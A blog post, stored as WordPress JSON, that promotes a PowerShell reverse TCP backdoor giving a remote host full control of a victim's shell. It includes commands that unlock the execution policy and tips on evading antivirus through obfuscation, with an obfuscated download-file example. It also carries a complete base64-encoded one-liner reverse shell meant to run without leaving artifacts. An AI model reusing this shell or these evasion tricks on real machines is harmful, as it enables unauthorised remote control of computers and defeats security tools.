{"id":10500,"date":"2020-05-07T17:34:09","date_gmt":"2020-05-07T12:04:09","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=10500"},"modified":"2020-05-07T17:34:09","modified_gmt":"2020-05-07T12:04:09","slug":"powershell","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/powershell\/","title":{"rendered":"Powershell-Reverse-TCP : PowerShell Script For Connecting To A Remote Host"},"content":{"rendered":"\n<p><strong>PowerShell <\/strong>script for connecting to a remote host. Remote host will have full control over client&#8217;s PowerShell and all its underlying commands.<\/p>\n\n\n\n<p>Tested with PowerShell v5.1.18362.752 on Windows 10 Enterprise OS (64 bit). Made for educational purposes. I hope it will help!<\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>How to Run?<\/strong><\/p>\n\n\n\n<p><strong>Change the IP address and port number inside the script.<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Open the PowerShell from <a href=\"https:\/\/github.com\/ivan-sincek\/powershell-reverse-tcp\/tree\/master\/src\">\\src\\<\/a> and run the commands shown below.<\/li><li>Set the execution policy:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>Set-ExecutionPolicy Unrestricted<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Run the script:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>.\\powershell_reverse_tcp.ps1<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Or run the following command from either PowerShell or Command Prompt:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PowerShell -ExecutionPolicy Unrestricted -File .\\powershell_reverse_tcp.ps1<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong>Also Read &#8211; <a href=\"https:\/\/kalilinuxtutorials.com\/skywrapper\/\" target=\"_blank\" rel=\"noreferrer noopener\">SkyWrapper : Tool To Discover Suspicious Creation Forms<\/a><\/strong><\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>PowerShell Obfuscation<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Try to bypass an antivirus or some other security mechanisms by obfuscating your scripts.<\/li><li>You can see such obfuscation in the example below.<\/li><li>Original PowerShell command:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>(New-Object Net.WebClient).DownloadFile($url, $out)<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Obfuscated PowerShell command:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>&amp; (`G`C`M *ke-E*) &#8216;(&amp; (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T).&#8221;`D`O`W`N`L`O`A`D`F`I`L`E&#8221;($url, $out)&#8217;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Check the original PowerShell script <a href=\"https:\/\/github.com\/ivan-sincek\/powershell-reverse-tcp\/blob\/master\/src\/powershell_reverse_tcp.ps1\">here<\/a> and the obfuscated one <a href=\"https:\/\/github.com\/ivan-sincek\/powershell-reverse-tcp\/blob\/master\/src\/powershell_reverse_tcp_obfuscated.ps1\">here<\/a>.<\/strong><\/li><li>Besides <a href=\"https:\/\/github.com\/ivan-sincek\/powershell-reverse-tcp\/blob\/master\/src\/powershell_reverse_tcp_manual.ps1\">manual obfuscation<\/a>, the original PowerShell script was also obfuscated with <a href=\"https:\/\/github.com\/danielbohannon\/Invoke-Obfuscation\">Invoke-Obfuscation<\/a>. Credits to the author!<\/li><li>Search the Internet for additional methods and obfuscation techniques.<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li>P.S. As the PowerShell is constantly being updated some regular expressions (e.g. <code><strong>*ke-E*<\/strong><\/code>) might start to throw errors due to multiple methods matching the same expression, so the expressions will need to be specified a little bit better.<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>PowerShell Encoded Command<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Use the one-liner below if you don&#8217;t want to leave any artifacts behind.<\/li><li>Encoded script will prompt for input. See the slightly altered script in my other <a href=\"https:\/\/github.com\/ivan-sincek\/invoker\/blob\/master\/ps\/powershell_reverse_tcp.ps1\">project<\/a>.<\/li><li>To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">PowerShell -ExecutionPolicy Unrestricted -EncodedCommand JABhAGQAZAByACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAEkAUAAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwANAAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7AA0ACgAkAHAAbwByAHQAIAA9ACAAJAAoAFIAZQBhAGQALQBIAG8AcwB0ACAALQBQAHIAbwBtAHAAdAAgACIARQBuAHQAZQByACAAcABvAHIAdAAgAG4AdQBtAGIAZQByACIAKQAuAFQAcgBpAG0AKAApADsADQAKAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwANAAoAaQBmACAAKAAkAGEAZABkAHIALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQAgAC0AbwByACAAJABwAG8AcgB0AC4ATABlAG4AZwB0AGgAIAAtAGwAdAAgADEAKQAgAHsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBvAHQAaAAgAHAAYQByAGEAbQBlAHQAZQByAHMAIABhAHIAZQAgAHIAZQBxAHUAaQByAGUAZAAiADsADQAKAH0AIABlAGwAcwBlACAAewANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUABvAHcAZQByAFMAaABlAGwAbAAgAFIAZQB2AGUAcgBzAGUAIABUAEMAUAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAeQAgAEkAdgBhAG4AIABTAGkAbgBjAGUAawAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIABHAGkAdABIAHUAYgAgAHIAZQBwAG8AcwBpAHQAbwByAHkAIABhAHQAIABnAGkAdABoAHUAYgAuAGMAbwBtAC8AaQB2AGEAbgAtAHMAaQBuAGMAZQBrAC8AcABvAHcAZQByAHMAaABlAGwAbAAtAHIAZQB2AGUAcgBzAGUALQB0AGMAcAAuACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACAAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwANAAoACQAkAHMAbwBjAGsAZQB0ACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAcwB0AHIAZQBhAG0AIAA9ACAAJABuAHUAbABsADsADQAKAAkAJABiAHUAZgBmAGUAcgAgAD0AIAAkAG4AdQBsAGwAOwANAAoACQAkAHcAcgBpAHQAZQByACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAZABhAHQAYQAgAD0AIAAkAG4AdQBsAGwAOwANAAoACQAkAHIAZQBzAHUAbAB0ACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJAHQAcgB5ACAAewANAAoACQAJACMAIABjAGgAYQBuAGcAZQAgAHQAaABlACAAaABvAHMAdAAgAGEAZABkAHIAZQBzAHMAIABhAG4AZAAvAG8AcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAgAGEAcwAgAG4AZQBjAGUAcwBzAGEAcgB5AA0ACgAJAAkAJABzAG8AYwBrAGUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKAAkAGEAZABkAHIALAAgACQAcABvAHIAdAApADsADQAKAAkACQAkAHMAdAByAGUAYQBtACAAPQAgACQAcwBvAGMAawBlAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwANAAoACQAJACQAYgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAMQAwADIANAA7AA0ACgAJAAkAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAHMAYwBpAGkARQBuAGMAbwBkAGkAbgBnADsADQAKAAkACQAkAHcAcgBpAHQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhAG0AKQA7AA0ACgAJAAkAJAB3AHIAaQB0AGUAcgAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7AA0ACgAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBhAGMAawBkAG8AbwByACAAaQBzACAAdQBwACAAYQBuAGQAIAByAHUAbgBuAGkAbgBnAC4ALgAuACIAOwANAAoACQAJAGQAbwAgAHsADQAKAAkACQAJACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUAKAAiAFAAUwA+ACIAKQA7AA0ACgAJAAkACQBkAG8AIAB7AA0ACgAJAAkACQAJACQAYgB5AHQAZQBzACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwANAAoACQAJAAkACQBpAGYAIAAoACQAYgB5AHQAZQBzACAALQBnAHQAIAAwACkAIAB7AA0ACgAJAAkACQAJAAkAJABkAGEAdABhACAAPQAgACQAZABhAHQAYQAgACsAIAAkAGUAbgBjAG8AZABpAG4AZwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHkAdABlAHMAKQA7AA0ACgAJAAkACQAJAH0AIABlAGwAcwBlACAAewANAAoACQAJAAkACQAJACQAZABhAHQAYQAgAD0AIAAiAGUAeABpAHQAIgA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0AIAB3AGgAaQBsAGUAIAAoACQAcwB0AHIAZQBhAG0ALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACkAOwANAAoACQAJAAkAaQBmACAAKAAkAGQAYQB0AGEALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAAgAC0AYQBuAGQAIAAkAGQAYQB0AGEAIAAtAG4AZQAgACIAZQB4AGkAdAAiACkAIAB7AA0ACgAJAAkACQAJAHQAcgB5ACAAewANAAoACQAJAAkACQAJACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABkAGEAdABhACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAOwANAAoACQAJAAkACQB9ACAAYwBhAHQAYwBoACAAewANAAoACQAJAAkACQAJACQAcgBlAHMAdQBsAHQAIAA9ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsADQAKAAkACQAJAAkAfQANAAoACQAJAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAkAHIAZQBzAHUAbAB0ACkAOwANAAoACQAJAAkACQBDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGQAYQB0AGEAIgA7AA0ACgAJAAkACQB9AA0ACgAJAAkAfQAgAHcAaABpAGwAZQAgACgAJABkAGEAdABhACAALQBuAGUAIAAiAGUAeABpAHQAIgApADsADQAKAAkAfQAgAGMAYQB0AGMAaAAgAHsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsADQAKAAkAfQAgAGYAaQBuAGEAbABsAHkAIAB7AA0ACgAJAAkAaQBmACAAKAAkAHMAbwBjAGsAZQB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsADQAKAAkACQAJACQAcwBvAGMAawBlAHQALgBDAGwAbwBzAGUAKAApADsADQAKAAkACQAJACQAcwBvAGMAawBlAHQALgBEAGkAcwBwAG8AcwBlACgAKQA7AA0ACgAJAAkAfQANAAoACQAJAGkAZgAgACgAJABzAHQAcgBlAGEAbQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AA0ACgAJAAkACQAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQA7AA0ACgAJAAkACQAkAHMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAYgB1AGYAZgBlAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAJABiAHUAZgBmAGUAcgAuAEMAbABlAGEAcgAoACkAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAdwByAGkAdABlAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAEMAbABvAHMAZQAoACkAOwANAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAEQAaQBzAHAAbwBzAGUAKAApADsADQAKAAkACQB9AA0ACgAJAAkAaQBmACAAKAAkAGQAYQB0AGEAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBkAGEAdABhACIAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAcgBlAHMAdQBsAHQAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgByAGUAcwB1AGwAdAAiADsADQAKAAkACQB9AA0ACgAJAH0ADQAKAH0ADQAKAA==<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))<\/strong><\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Images<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-OljRj6wSfoE\/XrLoy3fl9WI\/AAAAAAAAGK8\/dsmI4hWv3TETwEgR3VdM5ZAhHpGfySRbwCLcBGAsYHQ\/s1600\/Images.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-CAQcviNVZTk\/XrLoyOS1e6I\/AAAAAAAAGK4\/9bD1w4qQLlI-BD9ip7Dkah-yIM8LdjhwACLcBGAsYHQ\/s1600\/Images-1.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<div class=\"wp-block-buttons aligncenter is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/ivan-sincek\/powershell-reverse-tcp\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>PowerShell script for connecting to a remote host. Remote host will have full control over client&#8217;s PowerShell and all its underlying commands. Tested with PowerShell v5.1.18362.752 on Windows 10 Enterprise OS (64 bit). Made for educational purposes. I hope it will help! How to Run? Change the IP address and port number inside the script. [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":16284,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png","fifu_image_alt":"Powershell-Reverse-TCP : PowerShell Script For Connecting To A Remote Host","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[2577,2585,2803,2846],"class_list":["post-10500","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-powershell","tag-powershell-reverse-tcp","tag-remote-host","tag-reverse-tcp"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>PowerShell Script For Connecting To A Remote Host<\/title>\n<meta name=\"description\" content=\"PowerShell script for connecting to a remote host. Remote host will have full control over client&#039;s PowerShell and all its underlying commands.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/powershell\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PowerShell Script For Connecting To A Remote Host\" \/>\n<meta property=\"og:description\" content=\"PowerShell script for connecting to a remote host. Remote host will have full control over client&#039;s PowerShell and all its underlying commands.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/powershell\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2020-05-07T12:04:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/powershell\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/powershell\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Powershell-Reverse-TCP : PowerShell Script For Connecting To A Remote Host\",\"datePublished\":\"2020-05-07T12:04:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/powershell\/\"},\"wordCount\":573,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/powershell\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png\",\"keywords\":[\"PowerShell\",\"Powershell-Reverse-TCP\",\"Remote Host\",\"Reverse-TCP\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/powershell\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/powershell\/\",\"name\":\"PowerShell Script For Connecting To A Remote Host\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/powershell\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/powershell\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png\",\"datePublished\":\"2020-05-07T12:04:09+00:00\",\"description\":\"PowerShell script for connecting to a remote host. Remote host will have full control over client's PowerShell and all its underlying commands.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/powershell\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/powershell\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PowerShell Script For Connecting To A Remote Host","description":"PowerShell script for connecting to a remote host. Remote host will have full control over client's PowerShell and all its underlying commands.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/powershell\/","og_locale":"en_US","og_type":"article","og_title":"PowerShell Script For Connecting To A Remote Host","og_description":"PowerShell script for connecting to a remote host. Remote host will have full control over client's PowerShell and all its underlying commands.","og_url":"https:\/\/kalilinuxtutorials.com\/powershell\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2020-05-07T12:04:09+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/powershell\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/powershell\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Powershell-Reverse-TCP : PowerShell Script For Connecting To A Remote 